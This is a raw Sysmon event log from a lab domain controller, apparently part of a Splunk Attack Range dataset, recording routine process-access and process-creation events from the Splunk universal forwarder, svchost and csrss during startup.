13:09:46.634{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-429A-6000-5000-000000009A01}4060C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002015Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.634{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002014Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.634{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002013Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.634{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002012Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.634{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002011Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.634{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002010Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.634{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002009Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.634{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002008Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.634{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002007Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.634{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002006Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.634{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-429A-6000-5000-000000009A01}4060C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002005Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.634{08A6967A-429A-6000-4F00-000000009A01}38802220C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{08A6967A-429A-6000-5000-000000009A01}4060C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1803d|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002004Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.643{08A6967A-429A-6000-5000-000000009A01}4060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" generate-sslC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{08A6967A-429A-6000-4F00-000000009A01}3880C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000002003Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.618{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-429A-6000-4F00-000000009A01}3880C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002002Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.618{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002001Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.618{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002000Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.618{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001999Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.618{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001998Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.618{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001997Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.618{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001996Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.618{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001995Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.618{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001994Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.618{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001993Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.618{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-429A-6000-4F00-000000009A01}3880C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001992Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.618{08A6967A-429A-6000-4E00-000000009A01}39003896C:\Windows\system32\cmd.exe{08A6967A-429A-6000-4F00-000000009A01}3880C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001991Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.628{08A6967A-429A-6000-4F00-000000009A01}3880C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{08A6967A-429A-6000-4E00-000000009A01}3900C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 2>&1 10341000x80000000000000001990Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.618{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-429A-6000-4E00-000000009A01}3900C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001989Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.618{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001988Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 